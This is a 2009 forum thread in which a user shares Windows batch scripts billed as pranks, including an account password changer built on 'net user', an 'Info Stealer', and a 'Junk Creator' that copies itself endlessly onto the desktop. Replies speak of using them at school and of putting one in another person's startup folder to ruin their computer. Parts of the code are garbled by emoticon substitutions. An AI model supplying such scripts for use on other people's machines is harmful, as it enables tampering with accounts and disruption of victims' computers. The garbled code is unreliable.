Post: Try These .bat codes! [Trust Me]
03-21-2009, 07:15 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Check these out....

Password Remover / Changer
Changes or removes a password on an account.
    :top
@echo off
color 6e
Title Password Remover/Changer by Shadow Ops
:begin
cls
echo Type the user name you wish to change the password for.
SET /p UDefine=
SET /a UDefine=%UDefine% *
cls
msg * To remove the password, press enter twice.
msg * To change the password, type in the new password. You cant see the characters but it works.
cls
net user %udefine% *
pause>nul
:end











Info Stealer
Creates a .txt file with the computer name, user name, time, and date.
    @echo off
echo Computer Name: %computername%>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo User Name: %username%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Time: %time>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls
echo Date: %date%>>%computername%.txt
echo.>>%computername%.txt
echo.>>%computername%.txt
cls



Alarm
Sounds an alarm through the cpu's internal speakers. Turning down volume will not stop it.
    :top

goto top


Junk Creator
Fills your desktop with useless icons until closed.
    cd %userprofile%\desktop
:top
copy %0 %random%.bmp
copy %0 %random%.txt
copy %0 %random%.exe
copy %0 %random%.bat
copy %0 %random%.dat
copy %0 %random%.ini
copy %0 %random%.html
copy %0 %random%.jpeg
copy %0 %random%.mp3
copy %0 %random%.wav
copy %0 %random%.com
copy %0 %random%.cat
copy %0 %random%.ctt
copy %0 %random%.cur
copy %0 %random%.ico
copy %0 %random%.gif
copy %0 %random%.dic
copy %0 %random%.hlp
copy %0 %random%.htm
copy %0 %random%.jpg
copy %0 %random%.py
copy %0 %random%.tmp
copy %0 %random%.web
copy %0 %random%.xhtml
copy %0 %random%.lnk
goto top


Flash Drive Backup
Backs up every thing on your flash drive to a folder called "Flash Drive Backup" on your desktop. *Must be in the root directory of the flash drive.

    @echo off
echo.
echo Backing up your flash drive...
echo.
FOR /F "TOKENS=*" %%A IN ('TIME/T'Winky Winky DO SET TIME=%%A
for /f "tokens=2-4 delims=/ " %%g in ('date /t'Winky Winky do (
set mm=%%g
set dd=%%h
set yy=%%i
)
for /f "tokens=3 delims=\" %%i in ("%USERPROFILE%") do (set user=%%i) 2>&1
if exist "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" (
rd /S /Q "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%"
)
SET time=%time::=.%
xcopy "*" "C:\Documents and Settings\%user%\Desktop\Flash Drive Backup\%mm%-%dd%-%yy% %time%" /s /i
echo.
echo Backup Complete!
echo.


-LordOfSpoon
-Shadow Ops

The following 6 users say thank you to LordOfSpoon™ for this useful post:

ꜛ  , Booshykins, l-MoNsT3R-l, NanuGama, RedKnight
04-03-2009, 02:41 AM #11
OMFG thats still funny!
06-08-2009, 10:50 PM #12
nice...I will be having fun at school tomorow
06-17-2009, 11:25 PM #13
CA5U4LTY
Pokemon Trainer
Heyyy!! finally some new interesting batch codes. thanks for the post.
06-18-2009, 10:29 PM #14
Originally posted by CA5U4LTY View Post
Heyyy!! finally some new interesting batch codes. thanks for the post.


Thanks Bro....
06-19-2009, 04:40 PM #15
Omfg, I seen a youtube video of this one!
Pretty ACE!
Is it 'Ok' for you to have it kept on your computer
As long as you dont open it? :P
(N00B Tbh) Happy
06-19-2009, 10:37 PM #16
Originally posted by Liam View Post
Omfg, I seen a youtube video of this one!
Pretty ACE!
Is it 'Ok' for you to have it kept on your computer
As long as you dont open it? :P
(N00B Tbh) Happy


Yes its ok
09-09-2009, 01:19 AM #17
Lol would be pretty funny if it was in his startup folder, Muhhahahaha
09-09-2009, 01:50 AM #18
Originally posted by hackerxide View Post
Lol would be pretty funny if it was in his startup folder, Muhhahahaha


Oh **** thats how you **** up some ones computer. lol
09-09-2009, 06:27 AM #19
A--p--p--l--e
An Orange Apple ???
.....
Last edited by A--p--p--l--e ; 01-14-2017 at 11:02 AM.

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo